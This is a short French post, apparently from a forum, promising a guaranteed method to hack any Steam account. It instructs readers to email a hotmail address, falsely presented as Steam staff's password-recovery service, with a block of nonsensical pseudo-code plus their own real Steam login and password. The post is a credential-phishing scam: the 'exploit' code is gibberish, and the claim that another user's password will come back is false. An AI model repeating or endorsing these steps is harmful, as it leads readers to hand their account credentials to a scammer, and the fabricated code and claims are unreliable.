LA SEULE FACON DE PIRATER UN COMPTE STEAM
**LA SEULE FACON DE PIRATER UN COMPTE STEAM**
Enfin la methode invancible pour pirater n'importe quel compte Steam !! Vous n'avez qu'a envoyer un e-mail au serveur qui traite les passwords oublies qui va faire allusion de votre mot de passe et celui du l'autre compte. Et vous recevez dans quelques minutes un e-mail du serveur qui vous delivre le mot de passe du compte que vous desirez.
Tappez n'importe quel login de compte et vous retrouverz le Pass !
3 Etapes :
1. Rentrer dans votre messagerie et ecrivez un Nouveau Message , comme Destinataire mettez cet email : steampoweraccount@hotmail.fr (c'est l'email que le staff de steam utilise pour trouver le password que quelq'un reclame quand il l'a perdu) et dans Objet mettez ce titre : " Retrieve Password "
2. Maintenant on n'est rendu la partie la plus importante, faite un ''copier'' ''coller'' du texte qui est ci-dessous et coller le dans votre message :
public * {Jsp.getNewName(have_pw().action("
http://law5.steam.passport.com/cgi-bin/user.pw.curmbox=search%2ocgi-bin%25!%20f01%20La%20victime}%20action=recoveR%20param=get%25!"));FileSelectionMode{_account:_password}% param={LOGIN DU COMPTE DESIRE}receiver={_account= VOTRE LOGIN COMPTE:_password:= VOTRE PASSWORD}");have_pw(recover, PW);cloak and send back to 'receiver' {D}/*end code*/}
3. ***Remplacer l'ecriture en majuscule (LOGIN DU COMPTE DESIRE, VOTRE LOGIN COMPTE, VOTRE PASSWORD)par ce qui doit etre ecrit***
Je vous rapelle le principe :
LOGIN DU COMPTE DESIRE : compte que vous voulez hacker (exemple : calimero).
VOTRE LOGIN COMPTE : votre compte steam ( il faut de vrais identifiants ).
VOTRE PASSWORD : le pass de votre vrai compte steam
Je comprend pas Je vien juste de l'ht